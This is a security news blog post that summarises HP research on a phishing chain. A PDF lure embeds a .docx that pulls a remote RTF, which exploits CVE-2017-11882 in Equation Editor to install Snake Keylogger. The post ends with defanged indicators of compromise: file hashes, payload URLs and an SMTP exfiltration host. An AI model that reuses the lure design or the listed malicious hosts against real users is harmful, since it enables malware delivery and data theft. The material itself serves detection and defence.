PDF Documents Carrying Snake KeyLogger – Info Stealer

Home/Compromised, Data Breach, Exploitation, IOC's, Malware, Microsoft, Targeted Attacks/PDF Documents Carrying Snake KeyLogger – Info Stealer

PDF Documents Carrying Snake KeyLogger – Info Stealer

Microsoft Office Files are exploited for social engineering lures (especially Excel and Word), as these file formats are highly preferred by the public. The users are comfortable because the applications used to access these files are ubiquitous.

Recently, a malware was isolated by HP research team due to its unique infection chain which was carried through a PDF document.

The threat actor depends on several strategies to dodge detections such as Shellcode Encryption, embedding of malicious files, running remotely hosted exploits. Using the format of PDF Documents to target a victim is out of the ordinary .

REMITTANCE.PDF

At First, “Remittance.pdf” is sent to the target as an e-mail attachment. If the target falls prey and clicks on the attachment, the document will be downloaded.

And when this document is opened, Adobe Reader prompts the victim to open a “.docx” file. This .docx file has been cleverly named as “has been verified. However PDF, jpeg, xlsx, .docx” to trick the user that is a part of the Adobe Reader Prompt.

Source : HP Research Blog

It was revealed by researchers that the .docx file is stored as an Embedded File Object after analyzing with the help of Didier Stevens’ “pdfid” script. This script scans the PDF document for any codes or keywords that execute upon running.

Source : HP Research Blog

To analyze the embedded file further in its fundamentals, “pdf-parser” from Didier Stevens’ toolbox is used. This script allows the investigator to extract the file from the PDF document and save it in the disk.

When the ‘.docx‘ file is opened, it downloads the .rtf file from a web server. Since the word document is an OOXML file, its contents can be unzipped and the URLs using the command are given in the below image.

Source : HP Research Blog

The URL pointed in the above image, is not a legitimate domain found in the Office Documents. This URL is in the document.xml.rels file, which lists the document’s relationships. The relationship here, shows an external object linking and embedding (OLE) object being loaded from this URL as below.

Source : HP Research Blog

Connecting to this URL leads to a redirect and then downloads an Rich Text Format document called f_document_shp.doc. For further analysis, rtfobj was used to check its contents for any OLE Objects.

EMBEDDED OLE OBJECTS

Source : HP Research Blog

As Shown Above, there are two OLE objects that can be saved to a disk using the same tool. indicated, both objects are not well-formed, so analyzing them could lead to confusing results.

So, to fix this the objects can be reconstructed as the malformed objects. After viewing the fundamentals of the objects using the oleid, it is found that the object relates to Microsoft Equation Editor – a feature in Word that is commonly exploited by attackers to run arbitrary code.

After examining the OLE Object, it is disclosed a shellcode that exploits the CVE-2017-11882– a remote code execution vulnerability- in Equation Editor.

The shellcode was cached in the OLENativeStream structure at the tail of the object. Using a function to locate the Shell Code in the memory by itself.

Without any further action, the researchers predict that the malware downloads an executable file called fresh.exe, a Snake Keylogger and runs it in the public user directory using ShellExecuteExW. The Snake Keylogger is an info-stealing malware, it also gives threat actors an option to select and configure desired features that generate different payloads.

INDICATOR OF COMPROMISE

REMMITANCE INVOICE.pdf

05dc0792a89e18f5485d9127d2063b343cfd2a5d497c9b5df91dc687f9a1341d

has been verified. however pdf, jpeg, xlsx, .docx

250d2cd13474133227c3199467a30f4e1e17de7c7c4190c4784e46ecf77e51fe

f_document_shp.doc

165305d6744591b745661e93dc9feaea73ee0a8ce4dbe93fde8f76d0fc2f8c3f

f_document_shp.doc_object_00001707.raw

297f318975256c22e5069d714dd42753b78b0a23e24266b9b67feb7352942962

Exploit shellcode

f1794bfabeae40abc925a14f4e9158b92616269ed9bcf9aff95d1c19fa79352e

fresh.exe (Snake Keylogger)

20a3e59a047b8a05c7fd31b62ee57ed3510787a979a23ce1fde4996514fae803

External OLE reference URL

hxxps://vtaurl[.]com/IHytw

External OLE reference final URL

hxxp://192.227.196[.]211/tea_shipping/f_document_shp.doc

Snake Keylogger payload URL

hxxp://192.227.196[.]211/FRESH/fresh.exe

Snake Keylogger exfiltration via SMTP

mail.saadzakhary[.]com:587

By | 2022-05-23T18:56:36+05:30 May 23rd, 2022|Compromised, Data Breach, Exploitation, IOC's, Malware, Microsoft, Targeted Attacks|

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!